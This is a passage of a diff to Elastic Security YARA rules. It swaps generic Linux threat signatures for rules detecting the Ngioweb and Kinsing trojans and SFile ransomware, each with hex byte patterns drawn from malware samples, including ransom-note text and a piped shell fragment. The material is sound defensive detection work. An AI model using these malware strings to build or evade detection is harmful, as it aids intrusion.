= "client_rsa_priv: %s" ascii fullword + $a3 = "drive: %s" ascii fullword + $a4 = "Map: %s" ascii fullword + $a5 = "encrypting %ls failed" wide fullword condition: all of them } -rule ELASTIC_Linux_Generic_Threat_Aa0C23D5 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ngioweb_8Bd3002C : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" author = "Elastic Security" - id = "aa0c23d5-e633-4898-91f8-3cf84c9dd6af" - date = "2024-05-21" - modified = "2024-06-12" + id = "8bd3002c-d9c7-4f93-b7f0-4cb9ba131338" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L984-L1004" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8314290b81b827e1a1d157c41916a41a1c033e4f74876acc6806ed79ebbcc13d" - logic_hash = "092f0ece2dfca3e02493c00afffe48ca4feccf56ab6f22d952a7ba5f115f3765" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ngioweb.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5480bc02aeebd3062e6d19e50a5540536ce140d950327cce937ff7e71ebd15e2" + logic_hash = "578fd1c3e6091df9550b3c2caf999d7a0432f037b0cc4b15642531e7fdffd7b7" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "acd33e82bcefde691df1cf2739518018f05e0f03ef2da692f3ccca810c2ef361" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "2ee5432cf6ead4eca3aad70e40fac7e182bdcc74dc22dc91a12946ae4182f1ab" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F } - $a2 = { 77 66 6F 66 60 6C 6E 62 67 6E 6A 6D } - $a3 = { 62 67 6E 6A 6D 77 66 6F 66 60 6C 6E } + $a = { 24 18 67 8A 09 84 C9 74 0D 80 F9 2E 75 02 FF C0 FF 44 24 18 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_8299C877 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ngioweb_A592A280 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" author = "Elastic Security" - id = "8299c877-a0c3-4673-96c7-58c80062e316" - date = "2024-05-21" - modified = "2024-06-12" + id = "a592a280-053f-47bc-8d74-3fa5d74bd072" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L1006-L1024" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "60c486049ec82b4fa2e0a53293ae6476216b76e2c23238ef1c723ac0a2ae070c" - logic_hash = "3e0653a02517faa3037fc5f3f01f6fb11164fecafc6eca457a122ef2d1a99010" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ngioweb.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5480bc02aeebd3062e6d19e50a5540536ce140d950327cce937ff7e71ebd15e2" + logic_hash = "b16cf5b527782680cc1da6f61dd537596792fed615993b19965ef2dbde701e64" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bae38e2a147dc82ffd66e89214d12c639c690f3d2e701335969f090a21bf0ba7" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "60f5ddd115fa1abac804d2978bbb8d70572de0df9da80686b5652520c03bd1ee" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { D0 4D E2 0D 10 A0 E1 07 00 A0 E3 1E 00 00 EB 00 00 50 E3 00 00 9D A5 01 0C A0 B3 0C D0 8D E2 04 E0 9D E4 1E FF 2F E1 04 70 2D E5 CA 70 A0 E3 00 00 00 EF 80 00 BD E8 1E FF 2F E1 04 70 2D E5 C9 } + $a = { 75 06 8B 7C 24 2C EB 2C 83 FD 01 75 06 8B 7C 24 3C EB 21 83 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_81Aa5579 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ngioweb_D57Aa841 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" author = "Elastic Security" - id = "81aa5579-6d94-42a7-9103-de3972dfe141" - date = "2024-05-21" - modified = "2024-06-12" + id = "d57aa841-8eb5-4765-9434-233ab119015f" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L1026-L1044" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6be0e2c98ba5255b76c31f689432a9de83a0d76a898c28dbed0ba11354fec6c2" - logic_hash = "c94d590daf61217335a72f3e1bc24b09084cf0a5a174c013c5aa97c01707c2bc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ngioweb.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "555d60bd863caff231700c5f606d0034d5aa8362862d1fd0c816615d59f582f7" + logic_hash = "b0db72ad81d27f5b2ac2d2bb903ff10849c304d40619fd95a39e7d48c64c45ba" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "60492dca0e33e2700c25502292e6ec54609b83c7616a96ae4731f4a1cd9e2f41" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "83a4eb7c8ac42097d3483bcf918823105b4ea4291a566b4184eacc2a0f3aa3a4" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { D0 4D E2 07 00 8D E8 03 10 A0 E3 0D 20 A0 E1 08 00 9F E5 84 00 00 EB 0C D0 8D E2 00 80 BD E8 66 00 90 00 01 C0 A0 E1 00 10 A0 E1 08 00 9F E5 02 30 A0 E1 0C 20 A0 E1 7B 00 00 EA 04 00 90 00 01 } + $a = { 24 0C 48 89 4C 24 10 4C 89 44 24 18 66 83 F8 02 74 10 BB 10 00 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_F2452362 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ngioweb_B97E0253 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" author = "Elastic Security" - id = "f2452362-dc55-452f-9e93-e6a6b74d8ebd" - date = "2024-05-21" - modified = "2024-06-12" + id = "b97e0253-497f-4c2c-9d4c-ad89af64847f" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L1046-L1065" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5ff46c27b5823e55f25c9567d687529a24a0d52dea5bc2423b36345782e6b8f6" - logic_hash = "95d51077cb7c0f4b089a2e2ee8fcbab204264ade7ddd64fc1ee0176183dc84e0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ngioweb.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5480bc02aeebd3062e6d19e50a5540536ce140d950327cce937ff7e71ebd15e2" + logic_hash = "dc11d50166a4d1b400c0df81295054192d42822dd3e065e374a92a31727d4dbd" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "cc293c87513ca1332e5ec13c9ce47efbe5e9c48c0cece435ac3c8bdbc822ea82" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "859f29acec8bb05b8a8e827af91e927db0b2390410179a0f5b03e7f71af64949" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 6F 72 69 67 69 6E 61 6C 5F 72 65 61 64 64 69 72 } - $a2 = { 45 72 72 6F 72 20 69 6E 20 64 6C 73 79 6D 3A 20 25 73 } + $a = { 41 5C 41 5D 41 5E 41 5F C3 67 0F BE 17 39 F2 74 12 84 D2 74 04 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_Da28Eb8B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ngioweb_66C465A0 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" author = "Elastic Security" - id = "da28eb8b-7176-4415-9c58-5f74da70f53d" - date = "2024-05-21" - modified = "2024-06-12" + id = "66c465a0-821d-43ea-82f5-fe787720bfbf" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L1067-L1086" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b3b4fcd19d71814d3b4899528ee9c3c2188e4a7a4d8ddb88859b1a6868e8433f" - logic_hash = "8b0892d0dd8a012a1f9cd87a0ad3321ae751dd17a96205c12e6648946cf2afe2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ngioweb.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7454ee074812d7fa49044de8190e17b5034b3f08625f547d1b04aae4054fd81a" + logic_hash = "71f224e3ee1ff29787258a61f29a37a9ddc51e9cb5df0693ea52fd4b6f0b5ad8" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "490b6a89ea704a25d0e21dfb9833d56bc26f93c788efb7fcbfe38544696d0dfd" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "e26071afff71506236b261a44e8f1903d348dd33b95597458649f377710492f4" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 4A 66 67 67 6C 6A 7D 60 66 67 33 29 62 6C 6C 79 24 68 65 60 } - $a2 = { 48 6A 6A 6C 79 7D 33 29 7D 6C 71 7D 26 61 7D 64 65 25 68 79 79 65 60 6A 68 7D 60 66 67 26 71 61 7D 64 65 22 71 64 65 25 68 79 79 65 60 6A 68 7D 60 66 67 26 71 64 65 32 78 34 39 27 30 25 60 64 68 6E 6C 26 7E 6C 6B 79 25 23 26 23 32 78 34 39 27 31 } + $a = { 75 E6 B2 07 FE C0 EB DE 83 EC 10 6A 00 6A 00 6A 00 6A 00 FF 74 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_A40Aaa96 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ngioweb_D8573802 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" author = "Elastic Security" - id = "a40aaa96-4dcf-45b8-a95e-7ed7f27a31b6" - date = "2024-05-21" - modified = "2024-06-12" + id = "d8573802-f141-4fd1-b06a-605451a72465" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L1088-L1108" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6f965252141084524f85d94169b13938721bce24cc986bf870473566b7cfd81b" - logic_hash = "ab05cbf494b3b78083fd3e71703effed797d803b0203f8a413eb69b746656b1d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ngioweb.yar#L101-L119" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7454ee074812d7fa49044de8190e17b5034b3f08625f547d1b04aae4054fd81a" + logic_hash = "b51ab7a7c26e889a4e8efc2b9883f709c17d82032b0c28ab3e30229d6f296367" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "ce2da00db88bba513f910bdb00e1c935d1d972fe20558e2ec8e3c57cdbd5b7be" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "0052566dda66ae0dfa54d68f4ce03b5a2e2a442c4a18d70f16fd02303a446e66" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 6D 61 69 6E 2E 55 69 6E 74 33 32 6E } - $a2 = { 6D 61 69 6E 2E 47 65 74 72 61 6E 64 } - $a3 = { 6D 61 69 6E 2E 28 2A 52 4E 47 29 2E 55 69 6E 74 33 32 } + $a = { 10 40 74 38 51 51 6A 02 FF 74 24 18 FF 93 C8 00 00 00 83 C4 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_E24558E1 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ngioweb_7926Bc8E : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" author = "Elastic Security" - id = "e24558e1-1337-4566-8816-9b83cbaccbf6" - date = "2024-05-21" - modified = "2024-06-12" + id = "7926bc8e-110f-4b8a-8cc5-003732b6fcfd" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L1110-L1130" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9f483ddd8971cad4b25bb36a5a0cfb95c35a12c7d5cb9124ef0cfd020da63e99" - logic_hash = "f1f33c719a4b41968c137ed43aa0591f97b4558d4dd9bd160df519dfbbc49205" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ngioweb.yar#L121-L139" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "555d60bd863caff231700c5f606d0034d5aa8362862d1fd0c816615d59f582f7" + logic_hash = "ac42dd714696825d64402861e96122cce7cd09ae8d9c43a19dd9cf95d7b09610" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "04ca7e3775e3830a3388a4ad83a5e0256992c9f7beb4b59defcfb684d8471122" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "246e06d73a3a61ade6ac5634378489890a5585e84be086e0a81eb7586802e98f" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 77 66 6F 66 60 6C 6E 62 67 6E 6A 6D } - $a2 = { 62 67 6E 6A 6D 77 66 6F 66 60 6C 6E } - $a3 = { 77 62 59 79 43 31 30 37 3A 36 3B 36 3A } + $a = { ED 74 31 48 8B 5B 10 4A 8D 6C 3B FC 48 39 EB 77 23 8B 3B 48 83 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_Ace836F1 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ngioweb_E2377400 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" author = "Elastic Security" - id = "ace836f1-74f0-4031-903b-ec5b95a40d46" - date = "2024-05-21" - modified = "2024-06-12" + id = "e2377400-8884-42fb-b524-9cdf836dac3a" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L1132-L1150" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "116aaba80e2f303206d0ba84c8c58a4e3e34b70a8ca2717fa9cf1aa414d5ffcc" - logic_hash = "c80af9d6f3e4d92cfa53429abbda944069d335fc89421a89e04089d236f5dddf" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ngioweb.yar#L141-L159" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b88daf00a0e890b6750e691856b0fe7428d90d417d9503f62a917053e340228b" + logic_hash = "71276698d1bdb9bc494fe6f1aa9755940583331836abc490e0b5ac3454d35de6" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "907b40e66d5da2faf142917304406d0a8abc7356d73b2a6a6789be22b4daf4ab" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "531a8fcb1c097f72cb9876a35ada622dd1129f90515d84b4c245920602419698" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 4E 54 4C 4D 53 53 50 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 73 25 73 } + $a = { EC 08 8B 5C 24 10 8B 43 20 85 C0 74 72 83 7B 28 00 74 6C 83 7B } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_E9Aef030 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ngioweb_994F1E97 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" author = "Elastic Security" - id = "e9aef030-7d8c-4e9d-a364-178c717516f0" - date = "2024-05-21" - modified = "2024-06-12" + id = "994f1e97-c370-4eb2-ac93-b5ebf112f55d" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L1152-L1170" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5ab72be12cca8275d95a90188a1584d67f95d43a7903987e734002983b5a3925" - logic_hash = "1d458e147d6667e2e0740d6d26fee05ac02f49e9eba30002852e723308b1b462" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ngioweb.yar#L161-L178" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "2384e787877b622445d7d14053a8340d2e97d3ab103a3fabfa08a40068726ad0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "50ae1497132a9f1afc6af5bf96a0a49ca00023d5f0837cb8d67b4fd8b0864cc7" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "6cc0ace6beb6c1bf4e10f9781bb551c10f48cc23efe9529d92b432b0ff88f245" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { D0 4D E2 00 50 A0 E1 0A 00 00 0A 38 40 80 E2 28 31 9F E5 10 00 8D E2 24 11 9F E5 04 20 A0 E1 0F E0 A0 E1 03 F0 A0 E1 04 00 A0 E1 14 31 9F E5 0F E0 A0 E1 03 F0 A0 E1 00 30 D5 E5 40 00 13 E2 05 } + $a = { C6 44 24 16 68 C6 44 24 15 63 C6 44 24 14 74 C6 44 24 13 61 C6 44 24 12 77 C6 44 24 11 2F C6 44 24 10 76 C6 44 24 0F 65 C6 44 24 0E 64 C6 44 24 0D 2F } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_A3C5F3Bd : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Sfile_9E347B52 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Ransomware Sfile (Linux.Ransomware.SFile)" author = "Elastic Security" - id = "a3c5f3bd-9afe-44f4-98da-6ad704d0dee1" - date = "2024-05-21" - modified = "2024-06-12" + id = "9e347b52-233a-4956-9f1f-7600c482e280" + date = "2023-07-29" + modified = "2024-02-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L1172-L1192" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8c093bcf3d83545ec442519637c956d2af62193ea6fd2769925cacda54e672b6" - logic_hash = "41e66d1f47e7197662aa661ef49ee1f3191fee07a49538dd631ce9cc6fdd56be" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_SFile.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "49473adedc4ee9b1252f120ad8a69e165dc62eabfa794370408ae055ec65db9d" + logic_hash = "394571fd5746132d15da97428c3afc149435d91d5432eadf1c838d4a6433c7c1" score = 75 - quality = 69 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "f86d540c4e884a9c893471cf08db86c9bf34162fe9970411f8e56917fd9d3d8f" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "094af0030d51d1e28405fc02a51ccc1bedf9e083b3d24b82c36f4b397eefbb0b" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 66 68 5F 72 65 6D 6F 76 65 5F 68 6F 6F 6B } - $a2 = { 66 68 5F 66 74 72 61 63 65 5F 74 68 75 6E 6B } - $a3 = { 66 68 5F 69 6E 73 74 61 6C 6C 5F 68 6F 6F 6B } + $a1 = { 49 74 27 73 20 6A 75 73 74 20 61 20 62 75 73 69 6E 65 73 73 2E } + $a2 = { 41 6C 6C 20 64 61 74 61 20 69 73 20 70 72 6F 70 65 72 6C 79 20 70 72 6F 74 65 63 74 65 64 20 61 67 61 69 6E 73 74 20 75 6E 61 75 74 68 6F 72 69 7A 65 64 20 61 63 63 65 73 73 20 62 79 20 73 74 65 61 64 79 20 65 6E 63 72 79 70 74 69 6F 6E 20 74 65 63 68 6E 6F 6C 6F 67 79 2E } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_3Fa2Df51 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Kinsing_196523Fa : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Kinsing (Linux.Trojan.Kinsing)" author = "Elastic Security" - id = "3fa2df51-fa0e-4149-8631-fa4bfb2fe66e" - date = "2024-05-21" - modified = "2024-06-12" + id = "196523fa-2bb5-4ada-b929-ddc3d5505b73" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L1194-L1213" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "89ec224db6b63936e8bc772415d785ef063bfd9343319892e832034696ff6f15" - logic_hash = "f43b659dd093a635d9723b2443366763132217aaf28c582ed43f180725f92f19" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Kinsing.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "baa5808fcf22700ae96844dbf8cb3bec52425eec365d2ba4c71b73ece11a69a2" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "3aa2bbc4e177574fa2ae737e6f27b92caa9a83e6e9a1704599be67e2c3482f6a" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "29fa6e4fe5cbcd5c927e6b065f3354e4e9015e65814400687b2361fc9a951c74" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 5B 6B 77 6F 72 6B 65 72 2F 30 3A 32 5D } - $a2 = { 2F 74 6D 70 2F 6C 6F 67 5F 64 65 2E 6C 6F 67 } + $a = { 64 65 38 5F 00 64 48 8B 0C 25 F8 FF FF FF 48 3B 61 10 76 35 48 83 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_Be02B1C9 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Kinsing_7Cdbe9Fa : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Kinsing (Linux.Trojan.Kinsing)" author = "Elastic Security" - id = "be02b1c9-fb48-434c-a0ee-a1a87938992c" - date = "2024-05-21" - modified = "2024-06-12" + id = "7cdbe9fa-39a3-43a0-853a-16f41e20f304" + date = "2021-12-13" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L1215-L1233" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ef6d47ed26f9ac96836f112f1085656cf73fc445c8bacdb737b8be34d8e3bcd2" - logic_hash = "a278c3a8033139d84c99a53901526895b154b5ef363fbeed47095889a5fb8d31" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Kinsing.yar#L20-L38" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b3527e3d03a30fcf1fdaa73a1b3743866da6db088fbfa5f51964f519e22d05e6" + logic_hash = "c6f5d2cf0430301ec0eae57808100203b69428f258e0e6882fecbc762d73f4bf" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "c803bfffa481ad01bbfe490f9732748f8988669eab6bdf9f1e0e55f5ba8917a3" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "2452c2821b4ca104a18d3733ee8f6744a738aca197aa35392c480e224a5f8175" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 18 48 89 FB 48 89 F5 48 8B 47 08 48 89 C2 48 C1 EA 18 88 14 24 48 89 C2 48 C1 EA 10 88 54 24 01 48 89 C2 48 C1 EA 08 88 54 24 02 88 44 24 03 48 8B 07 48 89 C2 48 C1 EA 18 88 54 24 04 } + $a = { 73 2E 72 75 22 20 7C 20 61 77 6B 20 27 7B 70 72 69 6E 74 20 } condition: all of them } -rule ELASTIC_Windows_Cryptominer_Generic_Dd1E4D1A : FILE +rule ELASTIC_Linux_Trojan_Kinsing_2C1Ffe78 : FILE MEMORY { meta: - description = "Detects Windows Cryptominer Generic (Windows.Cryptominer.Generic)" + description = "Detects Linux Trojan Kinsing (Linux.Trojan.Kinsing)" author = "Elastic Security" - id = "dd1e4d1a-2e2f-4af0-bd66-2e12367dd064" - date = "2021-01-12" - modified = "2021-08-23" + id = "2c1ffe78-a965-4a70-8a9c-2cad705f8be7" + date = "2021-12-13" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = 